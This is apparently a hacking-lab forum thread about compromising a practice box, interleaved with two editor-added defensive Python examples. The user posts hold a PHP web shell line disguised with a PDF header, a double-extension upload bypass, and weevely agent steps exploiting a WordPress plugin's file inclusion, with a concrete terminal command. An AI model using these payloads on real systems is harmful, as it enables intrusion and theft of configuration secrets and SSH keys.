Posts: 42 Threads: 0 Joined: N/A August 7, 2022 at 9:14 AM

> (August 7, 2022, 08:41 AM) farkow Wrote:
> > (August 7, 2022, 01:31 AM) loge23 Wrote:
> > > (August 7, 2022, 01:24 AM) bigdare Wrote:
> > > How is everyone bypassing disable_functions? Literally all the good stuff is disabled and I've tried some known bypasses and none work.
> >
> > https://github.com/epinna/weevely3
>
> Guys this is the best tip ever, focus on this. It does not matter if brandfolder plugin is disabled, it is a php file, and it is going to be executed as lexi.

we don't have permissions to write files though right?

Posts: 70 Threads: 0 Joined: N/A August 7, 2022 at 9:54 AM

> (August 7, 2022, 09:14 AM) qwerty173 Wrote:
> [...]
> we don't have permissions to write files though right?

There are places that you can write files anyway - which is okay because you will reach your files via callback.php. So, if you create an agent with that tool and upload that file, use brandfolder's file inclusion vulnerability to reach your agent, and this agent will bypass the checks - and you can actually open a small shell with this tool - which means you are actually lexi through the php process. But read callback.php first so you can decide how you can rename your file or maybe add some other requirements next to your agent php.
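The post above describes the weak spot a defender cares about: the plugin's callback.php builds a require_once path from a request-supplied base directory, so any directory the web user can write to becomes an include root. The block below is an editor-added example, not the plugin's code and not anything posted in the thread. It models the check callback.php would need (resolve the supplied path and require it to sit under the WordPress root) and runs a small detector over constructed Apache-style access-log lines that flags requests to callback.php whose wp_abspath value resolves outside that root. WP_ROOT, CALLBACK_PATH, the log lines and the IP addresses are assumptions made for the example.

```python
"""Mitigation and detection model for a base-path include parameter.
Added example; the plugin's real code is not reproduced, and every log
line below is constructed for the demonstration."""
import os
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical WordPress document root used throughout the example.
WP_ROOT = "/var/www/html"
# Request path of the plugin endpoint discussed in the thread.
CALLBACK_PATH = "/wp-content/plugins/brandfolder/callback.php"


def is_safe_abspath(candidate: str, allowed_root: str = WP_ROOT) -> bool:
    """Accept an externally supplied base path only if, after resolving
    symlinks, '..' segments and trailing slashes, it is the allowed root
    itself or a directory beneath it. A plain string-prefix test would be
    fooled by '/var/www/htmlx' or by '..', so compare resolved paths."""
    if not candidate:
        return False
    resolved = os.path.realpath(candidate)
    root = os.path.realpath(allowed_root)
    try:
        return os.path.commonpath([resolved, root]) == root
    except ValueError:  # mixing absolute and relative paths
        return False


# Combined-log-format fields we need: client IP, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines, allowed_root: str = WP_ROOT):
    """Return one finding per request that reaches callback.php with a
    wp_abspath parameter that does not resolve inside the WordPress root.
    A legitimate front end never needs to set the base path at all, so the
    mere presence of the parameter is worth logging; the outside-root case
    is the one reported here as confirmed abuse."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != CALLBACK_PATH:
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("wp_abspath", []):
            if not is_safe_abspath(value, allowed_root):
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "wp_abspath": value,
                    "status": int(m.group("status")),
                })
    return findings


# Constructed sample: two abusive requests, one parameterless call, one unrelated hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Aug/2022:10:59:01 +0000] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/tmp/agentdir/ HTTP/1.1" 200 512 "-" "python-requests/2.28"',
    '10.0.0.9 - - [07/Aug/2022:11:02:13 +0000] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/../../../tmp/x/ HTTP/1.1" 200 512 "-" "curl/7.81"',
    '10.0.0.7 - - [07/Aug/2022:11:05:40 +0000] "GET /wp-content/plugins/brandfolder/callback.php HTTP/1.1" 500 231 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [07/Aug/2022:11:06:00 +0000] "GET /index.php?p=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} wp_abspath={f['wp_abspath']!r} status={f['status']}")
```

The realpath-then-commonpath comparison is the part to carry over into the PHP side (realpath() plus a strict prefix test against ABSPATH); a symlink inside the root that points outside it is resolved before the comparison, so it is rejected too.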
> (August 7, 2022, 09:54 AM) farkow Wrote:
> > (August 7, 2022, 09:14 AM) qwerty173 Wrote:
> > [...]
> > we don't have permissions to write files though right?
>
> There are places that you can write files anyway [...] But read callback.php first so you can decide how you can rename your file or maybe add some other requirements next to your agent php.

And of course, this will allow you to read wp-config.php and lexi's ssh key

Posts: 28 Threads: 0 Joined: N/A August 7, 2022 at 10:42 AM

> (August 7, 2022, 07:36 AM) nhocit Wrote:
> > (August 7, 2022, 12:24 AM) fironeDerbert Wrote:
> > > (August 7, 2022, 12:20 AM) vexxxi Wrote:
> > > any hint for how to bypass pdf filter ? won't let me upload even normal pdf :s
> >
> > You have to set the name like something.pdf.php and keep the pdf first line and last line format
>
> I uploaded it already like this. The shell doesn't work! Only echo worked. It seems like the server disables the shell_exec, system, and passthrough functions!
> <?php system($_REQUEST['th']); echo "%PDF-1"; ?>

Don't use the template payload; if there are some opened descriptors you won't be able to create a reverse shell, just create a new process for that... that was my problem, I hope it can help you. https://security.stackexchange.com/questions/198928/reverse-php-shell-disconnecting-when-netcat-listener

Posts: 17 Threads: 0 Joined: N/A August 7, 2022 at 10:56 AM

> (August 7, 2022, 09:54 AM) farkow Wrote:
> [...]
> And of course, this will allow you to read wp-config.php and lexi's ssh key

hello, can you tell me more information on how I can escalate my privileges to read the wp-config.php

Posts: 70 Threads: 0 Joined: N/A August 7, 2022 at 10:59 AM

This is how I managed to do it.
- Tunnel 8080 to my local port 8090 with chisel
- Generated my agent code with weevely, and renamed the file to wp-load.php
- In a writeable folder on the victim's machine
- I have copied my agent (wp-load.php) to that directory
- I have created the required folders and files (callback.php - require_once)
- I have used empty php files (<?php ?>) for the files mentioned in callback.php
- I opened a terminal with weevely
weevely terminal http://127.0.0.1:8090/wp-content/plugins/brandfolder/callback.php?wp_abspath=/WRITEABLEFOLDER/
[!] No file name, just a folder, so callback.php can load wp-load.php inside.
[!] Not 8080, but your tunnel port there.

Posts: 17 Threads: 0 Joined: N/A August 7, 2022 at 11:33 AM

> (August 7, 2022, 10:59 AM) farkow Wrote:
> This is how I managed to do it.
> [...]
> - In a writeable folder on the victim's machine
> [...]

how did you get that writable folder?

Posts: 42 Threads: 0 Joined: N/A August 7, 2022 at 11:36 AM

> (August 7, 2022, 11:33 AM) 0xpwny Wrote:
> > (August 7, 2022, 10:59 AM) farkow Wrote:
> > This is how I managed to do it. [...]
>
> how did you get that writable folder?

I assume you could just use something like /tmp/ right? I'm trying but it's still not working. I'm forwarding socks though so idk if that changes things...

Posts: 17 Threads: 0 Joined: N/A August 7, 2022 at 11:43 AM

> (August 7, 2022, 11:36 AM) qwerty173 Wrote:
> [...]
> I assume you could just use something like /tmp/ right? I'm trying but it's still not working. I'm forwarding socks though so idk if that changes things...

can you explain this step to me: - I have created the required folders and files (callback.php - require_once)
Posts: 17 Threads: 0 Joined: N/A August 7, 2022 at 12:03 PM

> (August 7, 2022, 10:59 AM) farkow Wrote:
> This is how I managed to do it.
> - Tunnel 8080 to my local port 8090 with chisel
> - Generated my agent code with weevely, and renamed the file to wp-load.php
> - In a writeable folder on the victim's machine
> [...]

can you explain steps 2 and 3 to me please

Posts: 24 Threads: 0 Joined: N/A August 7, 2022 at 12:05 PM

> (August 7, 2022, 02:45 AM) yumi Wrote:
> > (August 7, 2022, 01:21 AM) vexxxi Wrote:
> > > (August 7, 2022, 01:12 AM) fironeDerbert Wrote:
> > > > (August 7, 2022, 12:49 AM) vexxxi Wrote:
> > > > > (August 7, 2022, 12:24 AM) fironeDerbert Wrote:
> > > > > You have to set the name like something.pdf.php and keep the pdf first line and last line format
> > > >
> > > > just tried that and wasn't able to get it to go through, it just always says only pdfs allowed. it should be getting uploaded to /logs/uploads/ right ?
> > >
> > > Try to upload a regular pdf and see how the filter works, and yes the file will be uploaded in /logs/uploads
> >
> > even for regular pdfs it still gives me the only pdf files allowed message, I've tried 3 different ones for regular upload including one of the ones from the logs/hash/logs.pdf
>
> upload a pdf you already found on the server. upload and with burp change the content from PDF to your php reverse shell.
> after that access http://moderators.htb/logs/uploads/shell.pdf.php

tried again today w/ the same pdf from the log files that i tried yesterday and now it finally accepts uploads, got shell. guess it might've been an issue w the box maybe; i tried this one + other regular pdfs, every single one was failing
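The filter the posts above work around is satisfied by a ".pdf" somewhere in the file name plus a PDF header in the body, which is why a double-extension name with a PDF first line gets through and then executes as PHP. The block below is an editor-added example, not the box's upload code and not anything from the thread: it models that weak check beside a hardened validator in which only the last extension counts, the body must carry the PDF header and trailer, and the stored file name is generated server-side so the client's name never reaches the filesystem. The file names and file bodies are constructed; the PHP body is a placeholder comment rather than a working payload.

```python
"""Weak PDF upload check beside a hardened one. Added example; the sample
file names and bodies are constructed for the demonstration."""
import os
import secrets
from dataclasses import dataclass

PDF_MAGIC = b"%PDF-"
PDF_TRAILER = b"%%EOF"
MAX_UPLOAD = 10 * 1024 * 1024  # 10 MiB, an assumed limit


@dataclass
class Verdict:
    accepted: bool
    reason: str
    stored_name: str = ""  # server-chosen name; empty when rejected


def weak_accepts(filename: str, content: bytes) -> bool:
    """Weak filter modelled on the behaviour reported in the thread: '.pdf'
    anywhere in the name and a PDF header at the start of the body. A name
    such as 'shell.pdf.php' passes, and the web server decides what to do
    with the trailing '.php'."""
    return ".pdf" in filename.lower() and content.startswith(PDF_MAGIC)


def strict_validate(filename: str, content: bytes) -> Verdict:
    """Hardened validator. Three independent controls, each sufficient to
    stop the double-extension trick on its own:
      1. only the final extension is considered, and it must be '.pdf';
      2. the body must look like a PDF from header to trailer;
      3. the stored name is random and fixed to '.pdf', so neither a second
         extension nor a path component supplied by the client survives."""
    base = os.path.basename(filename.replace("\\", "/"))  # strip client-sent paths
    _stem, ext = os.path.splitext(base)                   # splitext keeps only the last extension
    if ext.lower() != ".pdf":
        return Verdict(False, f"final extension {ext!r} is not .pdf")
    if len(content) == 0 or len(content) > MAX_UPLOAD:
        return Verdict(False, "empty or oversized body")
    if not content.startswith(PDF_MAGIC):
        return Verdict(False, "body does not start with %PDF-")
    if not content.rstrip().endswith(PDF_TRAILER):
        return Verdict(False, "body does not end with %%EOF")
    # The client's name is discarded entirely; the upload directory should
    # additionally be served without a PHP handler, but naming alone already
    # removes the '.php' that the handler would key on.
    return Verdict(True, "ok", secrets.token_hex(16) + ".pdf")


# Constructed sample bodies.
GOOD_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
DISGUISED = b"%PDF-1.4\n<?php /* php code would go here */ ?>\n%%EOF\n"
PLAIN_PHP = b"<?php /* php code would go here */ ?>\n"


def compare(filename: str, content: bytes) -> dict:
    """Run both checks on one upload and report the outcomes side by side."""
    strict = strict_validate(filename, content)
    return {
        "filename": filename,
        "weak": weak_accepts(filename, content),
        "strict": strict.accepted,
        "reason": strict.reason,
    }


if __name__ == "__main__":
    for name, body in [("report.pdf", GOOD_PDF), ("shell.pdf.php", DISGUISED),
                       ("shell.php", PLAIN_PHP), ("../../x.pdf", GOOD_PDF)]:
        print(compare(name, body))
```

Note that a name like "shell.php.pdf" also passes control 1, which is exactly why control 3 matters: under Apache's AddHandler configuration a ".php" segment anywhere in the name can select the PHP handler, so the defence is to never write the client-supplied name to disk at all.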